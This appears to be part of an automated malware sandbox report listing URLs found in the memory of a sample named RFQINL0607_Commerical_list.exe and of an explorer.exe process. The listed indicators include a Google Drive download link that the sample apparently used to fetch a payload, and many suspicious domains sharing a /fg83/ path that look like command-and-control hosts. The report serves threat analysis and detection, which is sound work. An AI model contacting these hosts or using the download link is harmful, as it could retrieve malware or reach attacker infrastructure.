      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gewep.cloud/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gewep.cloud/fg83/www.telefonino.shop
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gewep.cloudReferer:
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kmxbcx.xyz
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kmxbcx.xyz/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kmxbcx.xyz/fg83/www.mtotem.online
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kmxbcx.xyzReferer:
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lido.systems
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lido.systems/fg83/
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lido.systems/fg83/www.ngbjf.cyou
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lido.systemsReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luckymotherclucker.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luckymotherclucker.com/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luckymotherclucker.com/fg83/www.nrodwukb.click
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luckymotherclucker.comReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtotem.online
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtotem.online/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtotem.online/fg83/www.visionaryglobalconsulting.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtotem.onlineReferer:
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbjf.cyou
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbjf.cyou/fg83/
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbjf.cyou/fg83/www.visionaryglobalconsulting.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbjf.cyouReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nrodwukb.click
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nrodwukb.click/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nrodwukb.click/fg83/www.deyuming.icu
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nrodwukb.clickReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pingpongtable-sg.bond
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pingpongtable-sg.bond/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pingpongtable-sg.bond/fg83/www.rtuakl.xyz
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pingpongtable-sg.bondReferer:
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11498070989.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620419539.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11502862919.0000000003057000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r5fesgy.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r5fesgy.com/fg83/
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r5fesgy.com/fg83/www.lido.systems
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r5fesgy.comReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtuakl.xyz
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtuakl.xyz/fg83/
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtuakl.xyz/fg83/www.r5fesgy.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtuakl.xyz/fg83/www.shebyoaksmovie.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtuakl.xyzReferer:
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sanlimarket.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sanlimarket.com/fg83/
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sanlimarket.com/fg83/www.ballbucketssalesstore.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sanlimarket.comReferer:
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfaiqhwxebvtre.net
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfaiqhwxebvtre.net/fg83/
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfaiqhwxebvtre.net/fg83/www.rtuakl.xyz
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfaiqhwxebvtre.netReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shebyoaksmovie.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shebyoaksmovie.com/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shebyoaksmovie.com/fg83/www.kmxbcx.xyz
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shebyoaksmovie.comReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.telefonino.shop
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.telefonino.shop/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.telefonino.shop/fg83/www.zentrimax.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.telefonino.shopReferer:
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.visionaryglobalconsulting.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.visionaryglobalconsulting.com/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.visionaryglobalconsulting.com/fg83/www.ddh979.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.visionaryglobalconsulting.com/fg83/www.sanlimarket.com
      Source: explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.visionaryglobalconsulting.comReferer:
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zentrimax.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zentrimax.com/fg83/
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zentrimax.com/fg83/www.luckymotherclucker.com
      Source: explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zentrimax.comReferer:
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C8D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
      Source: explorer.exe, 00000004.00000003.12980663330.000000000914A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.000000000911A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16270130996.000000000914B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS0
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS1
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSst.exe-
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000004.00000002.16270130996.000000000914B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3076063914DA481793CFCA20D17646AC&timeOut=5000&oc
      Source: explorer.exe, 00000004.00000003.12983429238.0000000009271000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12980663330.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16271947395.0000000009272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: explorer.exe, 00000004.00000003.12983429238.0000000009271000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12980663330.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16271947395.0000000009272000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comC
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/test/finance/CurrencyReddown.svg
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/AQI/uspl03.svg
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/AAehyQC.svg
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Teaser/tempdrop1.svg
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeS
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeS-dark
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyac
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyac-dark
      Source: explorer.exe, 00000004.00000000.11509900048.00000000005D3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16256465760.00000000005D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11498070989.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620419539.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11502862919.0000000003057000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000003028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-14-bk-docs.googleusercontent.com/
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11498070989.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620419539.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11503614413.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11591520447.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11502862919.0000000003057000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620301741.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-14-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/si1abd4u
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.000000000301A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000003028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11641731216.00000000326F0000.00000004.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000003028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79L
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000003028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79z
      Source: explorer.exe, 00000004.00000003.12984871283.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12983429238.0000000009271000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12980663330.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16285862021.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16271947395.0000000009272000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA10Ozqi.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA125lCw.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13ujqB.img
